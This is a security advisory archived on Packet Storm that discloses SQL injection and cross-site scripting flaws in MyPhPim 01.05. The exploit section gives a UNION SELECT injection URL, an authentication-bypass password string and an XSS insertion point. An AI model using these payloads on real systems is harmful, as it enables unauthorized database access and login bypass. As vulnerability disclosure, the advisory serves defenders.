what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

EV0022.txt

EV0022.txt
Posted Jan 15, 2006
Authored by Aliaksandr Hartsuyeu

MyPhPim version 01.05 is susceptible to cross site scripting and SQL injection vulnerabilities. Exploitation details provided.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | eeef0931b9afa48322ab03f07593527991dc7fd8d24cba2c2378ba282718c777

EV0022.txt

Change Mirror Download
New eVuln Advisory:
MyPhPim Multiple SQL Injection and XSS Vulnerabilities

--------------------Summary----------------

Software: MyPhPim
Sowtware's Web Site: http://sourceforge.net/projects/myphpim/
Versions: 01.05
Critical Level: Moderate
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
Published: 2006.01.11
eVuln ID: EV0022

-----------------Description---------------
All user defined data isn't properly sanitized. This can be used to make any SQL query by injecting arbitrary SQL code or insert any javascript code.

--------------Exploit----------------------
SQL Injection Examples:

http://host/myphpim/calendar.php3?menu=detail&cal_id=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

or

on login page:
login: [first registered user]
pass: a") or "a"="a"/*


Cross-Site Scripting Example

Create New todo For [user] Page:
Description value: <XSS>

--------------Solution---------------------
No Patch available.

--------------Credit-----------------------
Original Advisory:
http://evuln.com/vulns/22/summary.html

Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close